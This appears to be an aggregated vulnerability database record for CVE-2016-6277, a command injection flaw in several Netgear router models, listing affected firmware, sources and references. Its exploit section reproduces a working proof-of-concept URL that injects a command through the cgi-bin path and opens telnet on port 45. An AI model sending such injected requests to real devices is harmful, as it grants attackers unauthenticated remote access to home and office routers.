ID

VAR-E-201612-0018


CVE

cve_id:CVE-2016-6277

Trust: 2.3

sources: BID: 94819 // PACKETSTORM: 155712 // PACKETSTORM: 141585 // EXPLOIT-DB: 40889

EDB ID

40889


TITLE

Netgear R7000 - Command Injection - CGI webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 40889

DESCRIPTION

Netgear R7000 - Command Injection. CVE-2016-6277 . webapps exploit for CGI platform

Trust: 0.6

sources: EXPLOIT-DB: 40889

AFFECTED PRODUCTS

vendor:netgearmodel:r7000scope: - version: -

Trust: 1.6

vendor:netgearmodel:r6400scope: - version: -

Trust: 0.5

vendor:netgearmodel:r7000 r6400 cgi-binscope:eqversion:/

Trust: 0.5

vendor:netgearmodel:r8000 1.0.3.4 1.1.2scope: - version: -

Trust: 0.3

vendor:netgearmodel:r7000 1.0.7.2 1.1.93scope: - version: -

Trust: 0.3

vendor:netgearmodel:r6400 1.0.1.6 1.0.4scope: - version: -

Trust: 0.3

sources: BID: 94819 // PACKETSTORM: 155712 // PACKETSTORM: 141585 // EXPLOIT-DB: 40889 // EDBNET: 89479

EXPLOIT

# Exploit Title: Netgear R7000 - Command Injection
# Date: 6-12-2016
# Exploit Author: Acew0rm
# Contact: https://twitter.com/Acew0rm1
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93

-Vulnerability
An unauthenticated user can inject commands threw
http://RouterIP/cgi-bin/;COMMAND.

-Proof Of Concept
http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45.

Trust: 1.0

sources: EXPLOIT-DB: 40889

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 40889

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 40889

TYPE

Command Injection

Trust: 1.6

sources: EXPLOIT-DB: 40889 // EDBNET: 89479

TAGS

tag:exploit

Trust: 1.0

tag:remote

Trust: 0.5

tag:code execution

Trust: 0.5

tag:arbitrary

Trust: 0.5

sources: PACKETSTORM: 155712 // PACKETSTORM: 141585

CREDITS

Acew0rm

Trust: 0.6

sources: EXPLOIT-DB: 40889

EXTERNAL IDS

db:NVDid:CVE-2016-6277

Trust: 2.3

db:NVDid:CVE-2016-582384

Trust: 2.0

db:CERT/CCid:VU#582384

Trust: 2.0

db:EXPLOIT-DBid:40889

Trust: 1.6

db:EDBNETid:89479

Trust: 0.6

db:EDBNETid:91885

Trust: 0.6

db:0DAYTODAYid:27299

Trust: 0.6

db:EDBNETid:91907

Trust: 0.6

db:PACKETSTORMid:155712

Trust: 0.5

db:PACKETSTORMid:141585

Trust: 0.5

db:BIDid:94819

Trust: 0.3

sources: BID: 94819 // PACKETSTORM: 155712 // PACKETSTORM: 141585 // EXPLOIT-DB: 40889 // EDBNET: 89479 // EDBNET: 91885 // EDBNET: 91907

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2016-6277

Trust: 2.0

url:https://www.exploit-db.com/exploits/40889/

Trust: 0.6

url:https://www.intelligentexploit.com

Trust: 0.6

url:https://0day.today/exploits/27299

Trust: 0.6

url:http://kb.netgear.com/000036386/cve-2016-582384

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/582384

Trust: 0.3

sources: BID: 94819 // PACKETSTORM: 155712 // PACKETSTORM: 141585 // EXPLOIT-DB: 40889 // EDBNET: 89479 // EDBNET: 91885 // EDBNET: 91907

SOURCES

db:BIDid:94819
db:PACKETSTORMid:155712
db:PACKETSTORMid:141585
db:EXPLOIT-DBid:40889
db:EDBNETid:89479
db:EDBNETid:91885
db:EDBNETid:91907

LAST UPDATE DATE

2022-07-27T09:24:24.316000+00:00


SOURCES UPDATE DATE

db:BIDid:94819date:2017-01-12T01:04:00

SOURCES RELEASE DATE

db:BIDid:94819date:2016-12-09T00:00:00
db:PACKETSTORMid:155712date:2019-12-17T15:52:02
db:PACKETSTORMid:141585date:2017-03-12T00:54:02
db:EXPLOIT-DBid:40889date:2016-12-07T00:00:00
db:EDBNETid:89479date:2016-12-08T00:00:00
db:EDBNETid:91885date:2017-03-14T00:00:00
db:EDBNETid:91907date:2017-03-15T00:00:00